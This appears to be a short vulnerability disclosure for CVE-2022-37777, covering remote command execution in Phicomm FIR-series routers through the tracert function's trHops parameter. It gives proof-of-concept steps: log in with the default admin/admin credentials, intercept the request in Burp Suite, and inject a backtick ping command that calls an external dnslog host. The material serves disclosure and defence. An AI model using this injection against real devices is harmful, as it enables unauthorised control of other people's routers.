Headline
CVE-2022-37777: Phicomm_Router/Tracert_2.md at main · SLoSnow9879/Phicomm_Router
Phicomm FIR151B A2, FIR302E A2, FIR300B A2, FIR303B A2 routers 3.0.1.17 and earlier were discovered to contain a remote command execution (RCE) vulnerability via the trHops parameter of the tracert function.
The FIR151B A2、FIR302E A2、FIR300B A2 and so on routers has remote command execution
Login feixun FIR151B A2 router by default password admin /admin
Find the system tool → system diagnosis → Tracert → IP address / domain name. There is remote command execution at Tracert
Enter the website IP at the IP address / domain name, for example: 8.8.8.8
Click Start diagnosis
Use burpsuite intercept and change trHops argument to 20`ping -c 3 abcdef.r4y19h.dnslog.cn`, forward this request
See the dnslog results, The command has been executed successfully